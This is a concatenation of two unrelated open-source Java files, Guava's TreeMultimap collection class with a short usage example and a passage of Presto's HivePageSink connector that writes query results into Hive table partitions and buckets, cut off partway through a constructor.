import static com.google.common.base.Preconditions.checkNotNull;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.Collection;
import java.util.Comparator;
import java.util.NavigableMap;
import java.util.NavigableSet;
import java.util.SortedSet;
import java.util.TreeMap;
import java.util.TreeSet;
import javax.annotation.Nullable;
/**
* Implementation of {@code Multimap} whose keys and values are ordered by
* their natural ordering or by supplied comparators. In all cases, this
* implementation uses {@link Comparable#compareTo} or {@link
* Comparator#compare} instead of {@link Object#equals} to determine
* equivalence of instances.
*
* <p><b>Warning:</b> The comparators or comparables used must be <i>consistent
* with equals</i> as explained by the {@link Comparable} class specification.
 * Otherwise, the resulting multimap will violate the general contract of {@link
 * SetMultimap}, which is specified in terms of {@link Object#equals}.
*
* <p>The collections returned by {@code keySet} and {@code asMap} iterate
* through the keys according to the key comparator ordering or the natural
* ordering of the keys. Similarly, {@code get}, {@code removeAll}, and {@code
* replaceValues} return collections that iterate through the values according
* to the value comparator ordering or the natural ordering of the values. The
* collections generated by {@code entries}, {@code keys}, and {@code values}
* iterate across the keys according to the above key ordering, and for each
* key they iterate across the values according to the value ordering.
*
* <p>The multimap does not store duplicate key-value pairs. Adding a new
* key-value pair equal to an existing key-value pair has no effect.
*
* <p>Null keys and values are permitted (provided, of course, that the
* respective comparators support them). All optional multimap methods are
* supported, and all returned views are modifiable.
*
* <p>This class is not threadsafe when any concurrent operations update the
* multimap. Concurrent read operations will work correctly. To allow concurrent
* update operations, wrap your multimap with a call to {@link
* Multimaps#synchronizedSortedSetMultimap}.
*
* <p>See the Guava User Guide article on <a href=
* "http://code.google.com/p/guava-libraries/wiki/NewCollectionTypesExplained#Multimap">
* {@code Multimap}</a>.
*
* @author Jared Levy
* @author Louis Wasserman
* @since 2.0
*/
@GwtCompatible(serializable = true, emulated = true)
public class TreeMultimap<K, V> extends AbstractSortedKeySortedSetMultimap<K, V> {
private transient Comparator<? super K> keyComparator;
private transient Comparator<? super V> valueComparator;
/**
* Creates an empty {@code TreeMultimap} ordered by the natural ordering of
* its keys and values.
*/
public static <K extends Comparable, V extends Comparable>
TreeMultimap<K, V> create() {
return new TreeMultimap<K, V>(Ordering.natural(), Ordering.natural());
}
/**
* Creates an empty {@code TreeMultimap} instance using explicit comparators.
* Neither comparator may be null; use {@link Ordering#natural()} to specify
* natural order.
*
* @param keyComparator the comparator that determines the key ordering
* @param valueComparator the comparator that determines the value ordering
*/
public static <K, V> TreeMultimap<K, V> create(
Comparator<? super K> keyComparator,
Comparator<? super V> valueComparator) {
return new TreeMultimap<K, V>(checkNotNull(keyComparator),
checkNotNull(valueComparator));
}
/**
* Constructs a {@code TreeMultimap}, ordered by the natural ordering of its
* keys and values, with the same mappings as the specified multimap.
*
* @param multimap the multimap whose contents are copied to this multimap
*/
public static <K extends Comparable, V extends Comparable>
TreeMultimap<K, V> create(Multimap<? extends K, ? extends V> multimap) {
return new TreeMultimap<K, V>(Ordering.natural(), Ordering.natural(),
multimap);
}
TreeMultimap(Comparator<? super K> keyComparator,
Comparator<? super V> valueComparator) {
super(new TreeMap<K, Collection<V>>(keyComparator));
this.keyComparator = keyComparator;
this.valueComparator = valueComparator;
}
private TreeMultimap(Comparator<? super K> keyComparator,
Comparator<? super V> valueComparator,
Multimap<? extends K, ? extends V> multimap) {
this(keyComparator, valueComparator);
putAll(multimap);
}
/**
* {@inheritDoc}
*
* <p>Creates an empty {@code TreeSet} for a collection of values for one key.
*
* @return a new {@code TreeSet} containing a collection of values for one
* key
*/
@Override SortedSet<V> createCollection() {
return new TreeSet<V>(valueComparator);
}
@Override
Collection<V> createCollection(@Nullable K key) {
if (key == null) {
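      // Descriptive note (added): invoking the key comparator on the null key makes the
      // comparator itself decide whether nulls are allowed; if it rejects nulls, its
      // NullPointerException is thrown here, otherwise the null key is handled normally.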
keyComparator().compare(key, key);
}
return super.createCollection(key);
}
/**
* Returns the comparator that orders the multimap keys.
*/
public Comparator<? super K> keyComparator() {
return keyComparator;
}
@Override
public Comparator<? super V> valueComparator() {
return valueComparator;
}
/*
* The following @GwtIncompatible methods override the methods in
* AbstractSortedKeySortedSetMultimap, so GWT will fall back to the ASKSSM implementations,
* which return SortedSets and SortedMaps.
*/
@Override
@GwtIncompatible("NavigableMap")
NavigableMap<K, Collection<V>> backingMap() {
return (NavigableMap<K, Collection<V>>) super.backingMap();
}
/**
* @since 14.0 (present with return type {@code SortedSet} since 2.0)
*/
@Override
@GwtIncompatible("NavigableSet")
public NavigableSet<V> get(@Nullable K key) {
return (NavigableSet<V>) super.get(key);
}
@Override
@GwtIncompatible("NavigableSet")
Collection<V> unmodifiableCollectionSubclass(Collection<V> collection) {
return Sets.unmodifiableNavigableSet((NavigableSet<V>) collection);
}
@Override
@GwtIncompatible("NavigableSet")
Collection<V> wrapCollection(K key, Collection<V> collection) {
return new WrappedNavigableSet(key, (NavigableSet<V>) collection, null);
}
/**
* {@inheritDoc}
*
* <p>Because a {@code TreeMultimap} has unique sorted keys, this method
* returns a {@link NavigableSet}, instead of the {@link java.util.Set} specified
* in the {@link Multimap} interface.
*
* @since 14.0 (present with return type {@code SortedSet} since 2.0)
*/
@Override
@GwtIncompatible("NavigableSet")
public NavigableSet<K> keySet() {
return (NavigableSet<K>) super.keySet();
}
@Override
@GwtIncompatible("NavigableSet")
NavigableSet<K> createKeySet() {
return new NavigableKeySet(backingMap());
}
/**
* {@inheritDoc}
*
* <p>Because a {@code TreeMultimap} has unique sorted keys, this method
* returns a {@link NavigableMap}, instead of the {@link java.util.Map} specified
* in the {@link Multimap} interface.
*
* @since 14.0 (present with return type {@code SortedMap} since 2.0)
*/
@Override
@GwtIncompatible("NavigableMap")
public NavigableMap<K, Collection<V>> asMap() {
return (NavigableMap<K, Collection<V>>) super.asMap();
}
@Override
@GwtIncompatible("NavigableMap")
NavigableMap<K, Collection<V>> createAsMap() {
return new NavigableAsMap(backingMap());
}
/**
* @serialData key comparator, value comparator, number of distinct keys, and
* then for each distinct key: the key, number of values for that key, and
* key values
*/
@GwtIncompatible("java.io.ObjectOutputStream")
private void writeObject(ObjectOutputStream stream) throws IOException {
stream.defaultWriteObject();
stream.writeObject(keyComparator());
stream.writeObject(valueComparator());
Serialization.writeMultimap(this, stream);
}
@GwtIncompatible("java.io.ObjectInputStream")
@SuppressWarnings("unchecked") // reading data stored by writeObject
private void readObject(ObjectInputStream stream)
throws IOException, ClassNotFoundException {
stream.defaultReadObject();
keyComparator = checkNotNull((Comparator<? super K>) stream.readObject());
valueComparator = checkNotNull((Comparator<? super V>) stream.readObject());
setMap(new TreeMap<K, Collection<V>>(keyComparator));
Serialization.populateMultimap(this, stream);
}
@GwtIncompatible("not needed in emulated source")
private static final long serialVersionUID = 0;
}
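/*
 * Illustrative sketch (not part of the original Guava sources): a minimal usage example of
 * the ordering and duplicate-suppression behaviour described in the TreeMultimap javadoc
 * above. The class name TreeMultimapUsageExample is invented for illustration only.
 */
class TreeMultimapUsageExample {
  public static void main(String[] args) {
    TreeMultimap<String, Integer> multimap = TreeMultimap.create();
    multimap.put("b", 2);
    multimap.put("a", 3);
    multimap.put("a", 1);
    multimap.put("a", 1); // duplicate key-value pair; adding it has no effect
    // Keys and values iterate in natural order: prints {a=[1, 3], b=[2]}
    System.out.println(multimap);
    // keySet() returns a NavigableSet because keys are unique and sorted
    System.out.println(multimap.keySet().first()); // prints a
  }
}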
|
|
/*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.facebook.presto.hive;
import com.facebook.presto.hive.HiveWriteUtils.FieldSetter;
import com.facebook.presto.hive.metastore.HivePageSinkMetadataProvider;
import com.facebook.presto.hive.metastore.Partition;
import com.facebook.presto.hive.metastore.StorageFormat;
import com.facebook.presto.hive.metastore.Table;
import com.facebook.presto.spi.ConnectorPageSink;
import com.facebook.presto.spi.ConnectorSession;
import com.facebook.presto.spi.Page;
import com.facebook.presto.spi.PageIndexer;
import com.facebook.presto.spi.PageIndexerFactory;
import com.facebook.presto.spi.PrestoException;
import com.facebook.presto.spi.block.Block;
import com.facebook.presto.spi.type.Type;
import com.facebook.presto.spi.type.TypeManager;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.base.Splitter;
import com.google.common.base.Strings;
import com.google.common.base.Throwables;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.Sets;
import com.google.common.primitives.Ints;
import io.airlift.json.JsonCodec;
import io.airlift.slice.Slice;
import it.unimi.dsi.fastutil.ints.Int2ObjectMap;
import it.unimi.dsi.fastutil.ints.Int2ObjectOpenHashMap;
import it.unimi.dsi.fastutil.objects.Object2IntMap;
import it.unimi.dsi.fastutil.objects.Object2IntOpenHashMap;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hive.common.FileUtils;
import org.apache.hadoop.hive.conf.HiveConf;
import org.apache.hadoop.hive.ql.exec.FileSinkOperator.RecordWriter;
import org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat;
import org.apache.hadoop.hive.serde2.SerDeException;
import org.apache.hadoop.hive.serde2.Serializer;
import org.apache.hadoop.hive.serde2.columnar.OptimizedLazyBinaryColumnarSerde;
import org.apache.hadoop.hive.serde2.objectinspector.SettableStructObjectInspector;
import org.apache.hadoop.hive.serde2.objectinspector.StructField;
import org.apache.hadoop.hive.serde2.typeinfo.TypeInfo;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.io.compress.DefaultCodec;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hive.common.util.ReflectionUtil;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Optional;
import java.util.OptionalInt;
import java.util.Properties;
import java.util.Set;
import java.util.concurrent.CompletableFuture;
import java.util.stream.Collectors;
import static com.facebook.presto.hive.HiveColumnHandle.SAMPLE_WEIGHT_COLUMN_NAME;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_INVALID_METADATA;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_PARTITION_READ_ONLY;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_PARTITION_SCHEMA_MISMATCH;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_PATH_ALREADY_EXISTS;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_TOO_MANY_OPEN_PARTITIONS;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_UNSUPPORTED_FORMAT;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_WRITER_CLOSE_ERROR;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_WRITER_DATA_ERROR;
import static com.facebook.presto.hive.HivePartitionKey.HIVE_DEFAULT_DYNAMIC_PARTITION;
import static com.facebook.presto.hive.HiveType.toHiveTypes;
import static com.facebook.presto.hive.HiveWriteUtils.createFieldSetter;
import static com.facebook.presto.hive.HiveWriteUtils.getField;
import static com.facebook.presto.hive.HiveWriteUtils.getRowColumnInspectors;
import static com.facebook.presto.hive.metastore.MetastoreUtil.getHiveSchema;
import static com.facebook.presto.spi.StandardErrorCode.NOT_FOUND;
import static com.google.common.base.MoreObjects.toStringHelper;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Verify.verify;
import static io.airlift.slice.Slices.wrappedBuffer;
import static java.lang.String.format;
import static java.util.Objects.requireNonNull;
import static java.util.UUID.randomUUID;
import static java.util.function.Function.identity;
import static java.util.stream.Collectors.joining;
import static java.util.stream.Collectors.toList;
import static java.util.stream.Collectors.toMap;
import static org.apache.hadoop.hive.conf.HiveConf.ConfVars.COMPRESSRESULT;
import static org.apache.hadoop.hive.metastore.api.hive_metastoreConstants.META_TABLE_COLUMNS;
import static org.apache.hadoop.hive.metastore.api.hive_metastoreConstants.META_TABLE_COLUMN_TYPES;
import static org.apache.hadoop.hive.serde2.objectinspector.ObjectInspectorFactory.getStandardStructObjectInspector;
public class HivePageSink
implements ConnectorPageSink
{
private static final int MAX_BUCKET_COUNT = 100000;
private static final int BUCKET_NUMBER_PADDING = Integer.toString(MAX_BUCKET_COUNT - 1).length();
private final String schemaName;
private final String tableName;
private final int[] dataColumnInputIndex; // ordinal of columns (not counting sample weight column)
private final List<DataColumn> dataColumns;
private final int[] partitionColumnsInputIndex; // ordinal of columns (not counting sample weight column)
private final List<String> partitionColumnNames;
private final List<Type> partitionColumnTypes;
private final OptionalInt bucketCount;
private final int[] bucketColumns;
private final List<TypeInfo> bucketColumnTypes;
private final HiveStorageFormat tableStorageFormat;
private final HiveStorageFormat partitionStorageFormat;
private final LocationHandle locationHandle;
private final LocationService locationService;
private final String filePrefix;
private final HivePageSinkMetadataProvider pageSinkMetadataProvider;
private final PageIndexer pageIndexer;
private final TypeManager typeManager;
private final HdfsEnvironment hdfsEnvironment;
private final JobConf conf;
private final int maxOpenPartitions;
private final JsonCodec<PartitionUpdate> partitionUpdateCodec;
private final List<Object> partitionRow;
private final Table table;
private final boolean immutablePartitions;
private final boolean compress;
private HiveRecordWriter[] writers;
private final List<Int2ObjectMap<HiveRecordWriter>> bucketWriters;
private int bucketWriterCount = 0;
private final ConnectorSession session;
public HivePageSink(
String schemaName,
String tableName,
boolean isCreateTable,
List<HiveColumnHandle> inputColumns,
HiveStorageFormat tableStorageFormat,
HiveStorageFormat partitionStorageFormat,
LocationHandle locationHandle,
LocationService locationService,
String filePrefix,
Optional<HiveBucketProperty> bucketProperty,
HivePageSinkMetadataProvider pageSinkMetadataProvider,
PageIndexerFactory pageIndexerFactory,
TypeManager typeManager,
HdfsEnvironment hdfsEnvironment,
int maxOpenPartitions,
boolean immutablePartitions,
boolean compress,
JsonCodec<PartitionUpdate> partitionUpdateCodec,
ConnectorSession session)
{
this.schemaName = requireNonNull(schemaName, "schemaName is null");
this.tableName = requireNonNull(tableName, "tableName is null");
requireNonNull(inputColumns, "inputColumns is null");
this.tableStorageFormat = requireNonNull(tableStorageFormat, "tableStorageFormat is null");
this.partitionStorageFormat = requireNonNull(partitionStorageFormat, "partitionStorageFormat is null");
this.locationHandle = requireNonNull(locationHandle, "locationHandle is null");
this.locationService = requireNonNull(locationService, "locationService is null");
this.filePrefix = requireNonNull(filePrefix, "filePrefix is null");
this.pageSinkMetadataProvider = requireNonNull(pageSinkMetadataProvider, "pageSinkMetadataProvider is null");
requireNonNull(pageIndexerFactory, "pageIndexerFactory is null");
this.typeManager = requireNonNull(typeManager, "typeManager is null");
this.hdfsEnvironment = requireNonNull(hdfsEnvironment, "hdfsEnvironment is null");
this.maxOpenPartitions = maxOpenPartitions;
this.immutablePartitions = immutablePartitions;
this.compress = compress;
this.partitionUpdateCodec = requireNonNull(partitionUpdateCodec, "partitionUpdateCodec is null");
// divide input columns into partition and data columns
ImmutableList.Builder<String> partitionColumnNames = ImmutableList.builder();
ImmutableList.Builder<Type> partitionColumnTypes = ImmutableList.builder();
ImmutableList.Builder<DataColumn> dataColumns = ImmutableList.builder();
for (HiveColumnHandle column : inputColumns) {
if (column.isPartitionKey()) {
partitionColumnNames.add(column.getName());
partitionColumnTypes.add(typeManager.getType(column.getTypeSignature()));
}
else {
dataColumns.add(new DataColumn(column.getName(), typeManager.getType(column.getTypeSignature()), column.getHiveType()));
}
}
this.partitionColumnNames = partitionColumnNames.build();
this.partitionColumnTypes = partitionColumnTypes.build();
this.dataColumns = dataColumns.build();
// determine the input index of the partition columns and data columns
// and determine the input index and type of bucketing columns
ImmutableList.Builder<Integer> partitionColumns = ImmutableList.builder();
ImmutableList.Builder<Integer> dataColumnsInputIndex = ImmutableList.builder();
Object2IntMap<String> dataColumnNameToIdMap = new Object2IntOpenHashMap<>();
Map<String, HiveType> dataColumnNameToTypeMap = new HashMap<>();
// sample weight column is passed separately, so index must be calculated without this column
List<HiveColumnHandle> inputColumnsWithoutSample = inputColumns.stream()
.filter(column -> !column.getName().equals(SAMPLE_WEIGHT_COLUMN_NAME))
.collect(toList());
for (int inputIndex = 0; inputIndex < inputColumnsWithoutSample.size(); inputIndex++) {
HiveColumnHandle column = inputColumnsWithoutSample.get(inputIndex);
if (column.isPartitionKey()) {
partitionColumns.add(inputIndex);
}
else {
dataColumnsInputIndex.add(inputIndex);
dataColumnNameToIdMap.put(column.getName(), inputIndex);
dataColumnNameToTypeMap.put(column.getName(), column.getHiveType());
}
}
this.partitionColumnsInputIndex = Ints.toArray(partitionColumns.build());
this.dataColumnInputIndex = Ints.toArray(dataColumnsInputIndex.build());
requireNonNull(bucketProperty, "bucketProperty is null");
if (bucketProperty.isPresent()) {
int bucketCount = bucketProperty.get().getBucketCount();
checkArgument(bucketCount < MAX_BUCKET_COUNT, "bucketCount must be smaller than 100000");
this.bucketCount = OptionalInt.of(bucketCount);
this.bucketColumns = bucketProperty.get().getBucketedBy().stream()
.mapToInt(dataColumnNameToIdMap::get)
.toArray();
this.bucketColumnTypes = bucketProperty.get().getBucketedBy().stream()
.map(dataColumnNameToTypeMap::get)
.map(HiveType::getTypeInfo)
.collect(Collectors.toList());
bucketWriters = new ArrayList<>();
}
else {
this.bucketCount = OptionalInt.empty();
this.bucketColumns = null;
this.bucketColumnTypes = null;
bucketWriters = null;
writers = new HiveRecordWriter[0];
}
this.pageIndexer = pageIndexerFactory.createPageIndexer(this.partitionColumnTypes);
// preallocate temp space for partition and data
this.partitionRow = Arrays.asList(new Object[this.partitionColumnNames.size()]);
if (isCreateTable) {
this.table = null;
Optional<Path> writePath = locationService.writePathRoot(locationHandle);
checkArgument(writePath.isPresent(), "CREATE TABLE must have a write path");
conf = new JobConf(hdfsEnvironment.getConfiguration(writePath.get()));
}
else {
Optional<Table> table = pageSinkMetadataProvider.getTable();
if (!table.isPresent()) {
throw new PrestoException(HIVE_INVALID_METADATA, format("Table %s.%s was dropped during insert", schemaName, tableName));
}
this.table = table.get();
Path hdfsEnvironmentPath = locationService.writePathRoot(locationHandle).orElseGet(() -> locationService.targetPathRoot(locationHandle));
conf = new JobConf(hdfsEnvironment.getConfiguration(hdfsEnvironmentPath));
}
this.session = requireNonNull(session, "session is null");
}
@Override
public Collection<Slice> finish()
{
// Must be wrapped in doAs entirely
// Implicit FileSystem initializations are possible in HiveRecordWriter#commit -> RecordWriter#close
return hdfsEnvironment.doAs(session.getUser(), this::doFinish);
}
private ImmutableList<Slice> doFinish()
{
ImmutableList.Builder<Slice> partitionUpdates = ImmutableList.builder();
if (!bucketCount.isPresent()) {
for (HiveRecordWriter writer : writers) {
if (writer != null) {
writer.commit();
PartitionUpdate partitionUpdate = writer.getPartitionUpdate();
partitionUpdates.add(wrappedBuffer(partitionUpdateCodec.toJsonBytes(partitionUpdate)));
}
}
}
else {
for (Int2ObjectMap<HiveRecordWriter> writers : bucketWriters) {
PartitionUpdate firstPartitionUpdate = null;
ImmutableList.Builder<String> fileNamesBuilder = ImmutableList.builder();
for (HiveRecordWriter writer : writers.values()) {
writer.commit();
PartitionUpdate partitionUpdate = writer.getPartitionUpdate();
if (firstPartitionUpdate == null) {
firstPartitionUpdate = partitionUpdate;
}
else {
verify(firstPartitionUpdate.getName().equals(partitionUpdate.getName()));
verify(firstPartitionUpdate.isNew() == partitionUpdate.isNew());
verify(firstPartitionUpdate.getTargetPath().equals(partitionUpdate.getTargetPath()));
verify(firstPartitionUpdate.getWritePath().equals(partitionUpdate.getWritePath()));
}
fileNamesBuilder.addAll(partitionUpdate.getFileNames());
}
if (firstPartitionUpdate == null) {
continue;
}
partitionUpdates.add(wrappedBuffer(partitionUpdateCodec.toJsonBytes(new PartitionUpdate(
firstPartitionUpdate.getName(),
firstPartitionUpdate.isNew(),
firstPartitionUpdate.getWritePath(),
firstPartitionUpdate.getTargetPath(),
fileNamesBuilder.build()))));
}
}
return partitionUpdates.build();
}
@Override
public void abort()
{
// Must be wrapped in doAs entirely
// Implicit FileSystem initializations are possible in HiveRecordWriter#rollback -> RecordWriter#close
hdfsEnvironment.doAs(session.getUser(), this::doAbort);
}
private void doAbort()
{
if (!bucketCount.isPresent()) {
for (HiveRecordWriter writer : writers) {
if (writer != null) {
writer.rollback();
}
}
}
else {
for (Int2ObjectMap<HiveRecordWriter> writers : bucketWriters) {
for (HiveRecordWriter writer : writers.values()) {
writer.rollback();
}
}
}
}
@Override
public CompletableFuture<?> appendPage(Page page, Block sampleWeightBlock)
{
if (page.getPositionCount() == 0) {
return NOT_BLOCKED;
}
Block[] dataBlocks = getDataBlocks(page, sampleWeightBlock);
Block[] partitionBlocks = getPartitionBlocks(page);
int[] indexes = pageIndexer.indexPage(new Page(page.getPositionCount(), partitionBlocks));
if (pageIndexer.getMaxIndex() >= maxOpenPartitions) {
throw new PrestoException(HIVE_TOO_MANY_OPEN_PARTITIONS, "Too many open partitions");
}
// Must be wrapped in doAs entirely
// Implicit FileSystem initializations are possible in HiveRecordWriter#addRow or #createWriter
return hdfsEnvironment.doAs(session.getUser(), () -> doAppend(page, dataBlocks, partitionBlocks, indexes));
}
private CompletableFuture<?> doAppend(Page page, Block[] dataBlocks, Block[] partitionBlocks, int[] indexes)
{
if (!bucketCount.isPresent()) {
if (pageIndexer.getMaxIndex() >= writers.length) {
writers = Arrays.copyOf(writers, pageIndexer.getMaxIndex() + 1);
}
for (int position = 0; position < page.getPositionCount(); position++) {
int writerIndex = indexes[position];
HiveRecordWriter writer = writers[writerIndex];
if (writer == null) {
for (int field = 0; field < partitionBlocks.length; field++) {
Object value = getField(partitionColumnTypes.get(field), partitionBlocks[field], position);
partitionRow.set(field, value);
}
writer = createWriter(partitionRow, filePrefix + "_" + randomUUID());
writers[writerIndex] = writer;
}
writer.addRow(dataBlocks, position);
}
}
else {
int bucketCount = this.bucketCount.getAsInt();
Block[] bucketBlocks = new Block[bucketColumns.length];
for (int i = 0; i < bucketColumns.length; i++) {
bucketBlocks[i] = page.getBlock(bucketColumns[i]);
}
Page bucketColumnsPage = new Page(page.getPositionCount(), bucketBlocks);
for (int i = bucketWriters.size(); i <= pageIndexer.getMaxIndex(); i++) {
bucketWriters.add(new Int2ObjectOpenHashMap<>());
}
for (int position = 0; position < page.getPositionCount(); position++) {
int writerIndex = indexes[position];
Int2ObjectMap<HiveRecordWriter> writers = bucketWriters.get(writerIndex);
int bucket = HiveBucketing.getHiveBucket(bucketColumnTypes, bucketColumnsPage, position, bucketCount);
HiveRecordWriter writer = writers.get(bucket);
if (writer == null) {
if (bucketWriterCount >= maxOpenPartitions) {
throw new PrestoException(HIVE_TOO_MANY_OPEN_PARTITIONS, "Too many open writers for partitions and buckets");
}
bucketWriterCount++;
for (int field = 0; field < partitionBlocks.length; field++) {
Object value = getField(partitionColumnTypes.get(field), partitionBlocks[field], position);
partitionRow.set(field, value);
}
writer = createWriter(partitionRow, computeBucketedFileName(filePrefix, bucket));
writers.put(bucket, writer);
}
writer.addRow(dataBlocks, position);
}
}
return NOT_BLOCKED;
}
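    // Illustrative example (added): computeBucketedFileName("out", 42) returns "out_bucket-00042";
    // the bucket number is zero-padded to BUCKET_NUMBER_PADDING digits (5, derived from MAX_BUCKET_COUNT).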
public static String computeBucketedFileName(String filePrefix, int bucket)
{
return filePrefix + "_bucket-" + Strings.padStart(Integer.toString(bucket), BUCKET_NUMBER_PADDING, '0');
}
private HiveRecordWriter createWriter(List<Object> partitionRow, String fileName)
{
checkArgument(partitionRow.size() == partitionColumnNames.size(), "size of partitionRow is different from partitionColumnNames");
List<String> partitionValues = partitionRow.stream()
.map(value -> (value == null) ? HIVE_DEFAULT_DYNAMIC_PARTITION : value.toString())
.collect(toList());
Optional<String> partitionName;
if (!partitionColumnNames.isEmpty()) {
partitionName = Optional.of(FileUtils.makePartName(partitionColumnNames, partitionValues));
}
else {
partitionName = Optional.empty();
}
// attempt to get the existing partition (if this is an existing partitioned table)
Optional<Partition> partition = Optional.empty();
if (!partitionRow.isEmpty() && table != null) {
partition = pageSinkMetadataProvider.getPartition(partitionValues);
}
boolean isNew;
Properties schema;
Path target;
Path write;
String outputFormat;
String serDe;
if (!partition.isPresent()) {
if (table == null) {
// Write to: a new partition in a new partitioned table,
// or a new unpartitioned table.
isNew = true;
schema = new Properties();
schema.setProperty(META_TABLE_COLUMNS, dataColumns.stream()
.map(DataColumn::getName)
.collect(joining(",")));
schema.setProperty(META_TABLE_COLUMN_TYPES, dataColumns.stream()
.map(DataColumn::getHiveType)
.map(HiveType::getHiveTypeName)
.collect(joining(":")));
target = locationService.targetPath(locationHandle, partitionName);
write = locationService.writePath(locationHandle, partitionName).get();
if (partitionName.isPresent() && !target.equals(write)) {
// When target path is different from write path,
// verify that the target directory for the partition does not already exist
if (HiveWriteUtils.pathExists(session.getUser(), hdfsEnvironment, target)) {
throw new PrestoException(HIVE_PATH_ALREADY_EXISTS, format("Target directory for new partition '%s' of table '%s.%s' already exists: %s",
partitionName,
schemaName,
tableName,
target));
}
}
}
else {
// Write to: a new partition in an existing partitioned table,
// or an existing unpartitioned table
if (partitionName.isPresent()) {
isNew = true;
}
else {
if (bucketCount.isPresent()) {
throw new PrestoException(HIVE_PARTITION_READ_ONLY, "Can not insert into bucketed unpartitioned Hive table");
}
if (immutablePartitions) {
throw new PrestoException(HIVE_PARTITION_READ_ONLY, "Unpartitioned Hive tables are immutable");
}
isNew = false;
}
schema = getHiveSchema(table);
target = locationService.targetPath(locationHandle, partitionName);
write = locationService.writePath(locationHandle, partitionName).orElse(target);
}
if (partitionName.isPresent()) {
// Write to a new partition
outputFormat = partitionStorageFormat.getOutputFormat();
serDe = partitionStorageFormat.getSerDe();
}
else {
// Write to a new/existing unpartitioned table
outputFormat = tableStorageFormat.getOutputFormat();
serDe = tableStorageFormat.getSerDe();
}
}
else {
            // Write to: an existing partition in an existing partitioned table
if (bucketCount.isPresent()) {
throw new PrestoException(HIVE_PARTITION_READ_ONLY, "Can not insert into existing partitions of bucketed Hive table");
}
if (immutablePartitions) {
throw new PrestoException(HIVE_PARTITION_READ_ONLY, "Hive partitions are immutable");
}
isNew = false;
// Append to an existing partition
HiveWriteUtils.checkPartitionIsWritable(partitionName.get(), partition.get());
StorageFormat storageFormat = partition.get().getStorage().getStorageFormat();
outputFormat = storageFormat.getOutputFormat();
serDe = storageFormat.getSerDe();
schema = getHiveSchema(partition.get(), table);
target = locationService.targetPath(locationHandle, partition.get(), partitionName.get());
write = locationService.writePath(locationHandle, partitionName).orElse(target);
}
return new HiveRecordWriter(
schemaName,
tableName,
partitionName.orElse(""),
compress,
isNew,
dataColumns,
outputFormat,
serDe,
schema,
fileName + getFileExtension(conf, outputFormat),
write.toString(),
target.toString(),
typeManager,
conf);
}
static String getFileExtension(JobConf conf, String outputFormat)
{
// text format files must have the correct extension when compressed
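        // For example (illustrative): with hive.exec.compress.output=true and no codec configured,
        // DefaultCodec yields ".deflate"; with org.apache.hadoop.io.compress.GzipCodec it yields ".gz".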
if (!HiveConf.getBoolVar(conf, COMPRESSRESULT) || !HiveIgnoreKeyTextOutputFormat.class.getName().equals(outputFormat)) {
return "";
}
String compressionCodecClass = conf.get("mapred.output.compression.codec");
if (compressionCodecClass == null) {
return new DefaultCodec().getDefaultExtension();
}
try {
Class<? extends CompressionCodec> codecClass = conf.getClassByName(compressionCodecClass).asSubclass(CompressionCodec.class);
return ReflectionUtil.newInstance(codecClass, conf).getDefaultExtension();
}
catch (ClassNotFoundException e) {
throw new PrestoException(HIVE_UNSUPPORTED_FORMAT, "Compression codec not found: " + compressionCodecClass, e);
}
catch (RuntimeException e) {
throw new PrestoException(HIVE_UNSUPPORTED_FORMAT, "Failed to load compression codec: " + compressionCodecClass, e);
}
}
private Block[] getDataBlocks(Page page, Block sampleWeightBlock)
{
Block[] blocks = new Block[dataColumnInputIndex.length + (sampleWeightBlock != null ? 1 : 0)];
for (int i = 0; i < dataColumnInputIndex.length; i++) {
int dataColumn = dataColumnInputIndex[i];
blocks[i] = page.getBlock(dataColumn);
}
if (sampleWeightBlock != null) {
// sample weight block is always last
blocks[blocks.length - 1] = sampleWeightBlock;
}
return blocks;
}
private Block[] getPartitionBlocks(Page page)
{
Block[] blocks = new Block[partitionColumnsInputIndex.length];
for (int i = 0; i < partitionColumnsInputIndex.length; i++) {
int dataColumn = partitionColumnsInputIndex[i];
blocks[i] = page.getBlock(dataColumn);
}
return blocks;
}
@VisibleForTesting
public static class HiveRecordWriter
{
private final String partitionName;
private final boolean isNew;
private final String fileName;
private final String writePath;
private final String targetPath;
private final int fieldCount;
@SuppressWarnings("deprecation")
private final Serializer serializer;
private final RecordWriter recordWriter;
private final SettableStructObjectInspector tableInspector;
private final List<StructField> structFields;
private final Object row;
private final FieldSetter[] setters;
public HiveRecordWriter(
String schemaName,
String tableName,
String partitionName,
boolean compress,
boolean isNew,
List<DataColumn> inputColumns,
String outputFormat,
String serDe,
Properties schema,
String fileName,
String writePath,
String targetPath,
TypeManager typeManager,
JobConf conf)
{
this.partitionName = partitionName;
this.isNew = isNew;
this.fileName = fileName;
this.writePath = writePath;
this.targetPath = targetPath;
// existing tables may have columns in a different order
List<String> fileColumnNames = Splitter.on(',').trimResults().omitEmptyStrings().splitToList(schema.getProperty(META_TABLE_COLUMNS, ""));
List<HiveType> fileColumnHiveTypes = toHiveTypes(schema.getProperty(META_TABLE_COLUMN_TYPES, ""));
// verify we can write all input columns to the file
Map<String, DataColumn> inputColumnMap = inputColumns.stream()
